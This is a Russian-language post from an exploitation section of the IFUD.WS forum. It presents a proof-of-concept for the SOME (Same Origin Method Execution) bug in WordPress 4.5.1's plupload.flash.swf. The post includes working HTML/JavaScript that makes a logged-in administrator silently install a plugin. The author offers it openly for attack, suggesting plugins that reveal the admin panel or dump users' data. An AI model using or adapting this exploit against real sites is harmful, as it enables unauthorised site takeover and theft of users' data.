1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

WP SOME баг

Тема в разделе "Веб-Уязвимости | Эксплуатация", создана пользователем DarkKnight, 26 июн 2016.

  1. TopicStarter Overlay
    DarkKnight

    DarkKnight

    Регистрация:
    1 июн 2016
    Сообщения:
    127
    Симпатии:
    150
    SOME (Тот же оригинальный метод выполнение) баг был открыт юзерами Heiderich, Filedescriptor, Kinugawa
    с помощью этого бага вы сможете выполнить RCE или XSS команды
    Баг находится в Wordpress 4.5.1 файле flash.swf
    с помощью ниже указанного POC вы сможете добавить в систему любой плагин
    Please login or register to view links
    Как можно использовать этот баг
    Для примера возьмем код
    Код:
    <button onclick="fire()">Click</button>
    <script>
    function fire() {
    open(’javascript:setTimeout("location=\\’http://example.com/wp-includes/js/plupload/plupload.flash.swf?target%g=opener.document.bOdy.firstElementChild.nextElementSibling.nextElementSibling.nextElementSibling.firstElementChild.click&uid%g=hello&\\’", 2000)’);
    setTimeout(’location="http://example.com/wp-admin/plugin-install.php?tab=plugin-information&plugin=wp-super-cache&TB_iframe=true&width=600&height=550"’)
    }
    </script>
    Можно установить плагин который находит админку или же показывает все данные юзеров
     
    • Like Like x 1

Поделиться этой страницей

Загрузка...